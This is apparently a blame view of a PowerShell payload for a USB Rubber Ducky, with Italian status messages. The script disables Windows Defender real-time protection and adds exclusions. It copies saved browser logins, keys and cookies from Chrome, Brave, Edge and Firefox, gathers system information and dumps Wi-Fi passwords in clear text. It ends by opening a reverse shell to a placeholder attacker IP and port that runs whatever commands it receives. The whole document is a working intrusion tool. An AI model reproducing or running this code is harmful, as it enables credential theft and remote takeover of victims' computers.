2024-07-24 19:15:49 +00:00
|
|
|
|
|
|
|
|
|
|
|
#-- Payload configuration --#
|
|
|
|
|
|
|
|
$DRIVE = 'DUCKY' # Drive letter of the USB Rubber Ducky
|
2024-07-24 19:23:43 +00:00
|
|
|
$IP = 'YOUR_IP' # IP address of the attacker machine
|
|
|
|
$PORT = 'YOUR_PORT' # Port to use for the reverse shell
|
2024-07-24 19:15:49 +00:00
|
|
|
|
|
|
|
|
2024-07-24 17:51:53 +00:00
|
|
|
# Set destination directory
|
2024-07-24 19:15:49 +00:00
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq $DRIVE }).DeviceID
|
2024-07-24 17:51:53 +00:00
|
|
|
Set-Location $duckletter
|
|
|
|
|
|
|
|
Set-MpPreference -DisableRealtimeMonitoring $true
|
|
|
|
Add-MpPreference -ExclusionPath "${duckletter}\"
|
|
|
|
Set-MpPreference -ExclusionExtension "ps1"
|
|
|
|
|
|
|
|
$destDir = "$duckletter\$env:USERNAME"
|
|
|
|
if (-Not (Test-Path $destDir)) {
|
|
|
|
New-Item -ItemType Directory -Path $destDir
|
|
|
|
}
|
|
|
|
|
|
|
|
# Function to copy browser files
|
|
|
|
function CopyBrowserFiles($browserName, $browserDir, $filesToCopy) {
|
|
|
|
$browserDestDir = Join-Path -Path $destDir -ChildPath $browserName
|
|
|
|
if (-Not (Test-Path $browserDestDir)) {
|
|
|
|
New-Item -ItemType Directory -Path $browserDestDir
|
|
|
|
}
|
|
|
|
|
|
|
|
foreach ($file in $filesToCopy) {
|
|
|
|
$source = Join-Path -Path $browserDir -ChildPath $file
|
|
|
|
if (Test-Path $source) {
|
|
|
|
Copy-Item -Path $source -Destination $browserDestDir
|
|
|
|
Write-Host "$browserName - File copiato: $file"
|
|
|
|
} else {
|
|
|
|
Write-Host "$browserName - File non trovato: $file"
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
# Configuration for Google Chrome
|
|
|
|
$chromeDir = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default"
|
|
|
|
$chromeFilesToCopy = @("Login Data")
|
|
|
|
CopyBrowserFiles "Chrome" $chromeDir $chromeFilesToCopy
|
|
|
|
Copy-Item -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" -Destination (Join-Path -Path $destDir -ChildPath "Chrome") -ErrorAction SilentlyContinue
|
|
|
|
|
|
|
|
# Configuration for Brave
|
|
|
|
$braveDir = "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Default"
|
|
|
|
$braveFilesToCopy = @("Login Data")
|
|
|
|
CopyBrowserFiles "Brave" $braveDir $braveFilesToCopy
|
|
|
|
Copy-Item -Path "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Local State" -Destination (Join-Path -Path $destDir -ChildPath "Brave") -ErrorAction SilentlyContinue
|
|
|
|
|
|
|
|
# Configuration for Firefox
|
|
|
|
$firefoxProfileDir = Join-Path -Path $env:APPDATA -ChildPath "Mozilla\Firefox\Profiles"
|
|
|
|
$firefoxProfile = Get-ChildItem -Path $firefoxProfileDir -Filter "*.default-release" | Select-Object -First 1
|
|
|
|
if ($firefoxProfile) {
|
|
|
|
$firefoxDir = $firefoxProfile.FullName
|
|
|
|
$firefoxFilesToCopy = @("logins.json", "key4.db", "cookies.sqlite", "webappsstore.sqlite", "places.sqlite")
|
|
|
|
CopyBrowserFiles "Firefox" $firefoxDir $firefoxFilesToCopy
|
|
|
|
} else {
|
|
|
|
Write-Host "Firefox - Nessun profilo trovato."
|
|
|
|
}
|
|
|
|
|
|
|
|
# Configuration for Microsoft Edge
|
|
|
|
$edgeDir = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default"
|
|
|
|
$edgeFilesToCopy = @("Login Data")
|
|
|
|
CopyBrowserFiles "Edge" $edgeDir $edgeFilesToCopy
|
|
|
|
Copy-Item -Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Local State" -Destination (Join-Path -Path $destDir -ChildPath "Edge") -ErrorAction SilentlyContinue
|
|
|
|
|
|
|
|
# Gather additional system information
|
|
|
|
function GatherSystemInfo {
|
|
|
|
$sysInfoDir = "$duckletter\$env:USERNAME\SystemInfo"
|
|
|
|
if (-Not (Test-Path $sysInfoDir)) {
|
|
|
|
New-Item -ItemType Directory -Path $sysInfoDir
|
|
|
|
}
|
|
|
|
|
|
|
|
Get-ComputerInfo | Out-File -FilePath "$sysInfoDir\computer_info.txt"
|
|
|
|
Get-Process | Out-File -FilePath "$sysInfoDir\process_list.txt"
|
|
|
|
Get-Service | Out-File -FilePath "$sysInfoDir\service_list.txt"
|
|
|
|
Get-NetIPAddress | Out-File -FilePath "$sysInfoDir\network_config.txt"
|
|
|
|
}
|
|
|
|
|
|
|
|
GatherSystemInfo
|
|
|
|
|
|
|
|
# Network scanning
|
|
|
|
|
|
|
|
|
|
|
|
# Retrieve Wi-Fi passwords
|
|
|
|
function GetWifiPasswords {
|
|
|
|
$wifiProfiles = netsh wlan show profiles | Select-String "\s:\s(.*)$" | ForEach-Object { $_.Matches[0].Groups[1].Value }
|
|
|
|
|
|
|
|
$results = @()
|
|
|
|
|
|
|
|
foreach ($profile in $wifiProfiles) {
|
|
|
|
$profileDetails = netsh wlan show profile name="$profile" key=clear
|
|
|
|
$keyContent = ($profileDetails | Select-String "Key Content\s+:\s+(.*)$").Matches.Groups[1].Value
|
|
|
|
$results += [PSCustomObject]@{
|
|
|
|
ProfileName = $profile
|
|
|
|
KeyContent = $keyContent
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
$results | Format-Table -AutoSize
|
|
|
|
|
|
|
|
# Save results to a file
|
|
|
|
$results | Out-File -FilePath "$duckletter\$env:USERNAME\WiFi_Details.txt"
|
|
|
|
}
|
|
|
|
|
|
|
|
GetWifiPasswords
|
|
|
|
|
|
|
|
# Reverse shell
|
|
|
|
function ReverseShell {
|
2024-07-24 19:15:49 +00:00
|
|
|
param(
|
|
|
|
[string]$ip,
|
|
|
|
[int]$port
|
|
|
|
)
|
2024-07-24 17:51:53 +00:00
|
|
|
|
|
|
|
$client = New-Object System.Net.Sockets.TCPClient($ip, $port)
|
|
|
|
$stream = $client.GetStream()
|
2024-07-24 19:15:49 +00:00
|
|
|
[byte[]]$bytes = 0..65535 | ForEach-Object {0}
|
2024-07-24 17:51:53 +00:00
|
|
|
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
|
|
|
|
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
|
2024-07-24 19:15:49 +00:00
|
|
|
$sendback = (Invoke-Expression $data 2>&1 | Out-String)
|
|
|
|
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
|
2024-07-24 17:51:53 +00:00
|
|
|
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
|
|
|
|
$stream.Write($sendbyte, 0, $sendbyte.Length)
|
|
|
|
$stream.Flush()
|
|
|
|
}
|
|
|
|
$client.Close()
|
|
|
|
}
|
|
|
|
|
2024-07-24 19:15:49 +00:00
|
|
|
ReverseShell -ip $IP -port $PORT
|
2024-07-24 17:51:53 +00:00
|
|
|
|
|
|
|
# Re-enable Windows Defender real-time monitoring
|
|
|
|
Set-MpPreference -DisableRealtimeMonitoring $false
|
|
|
|
|
|
|
|
exit
|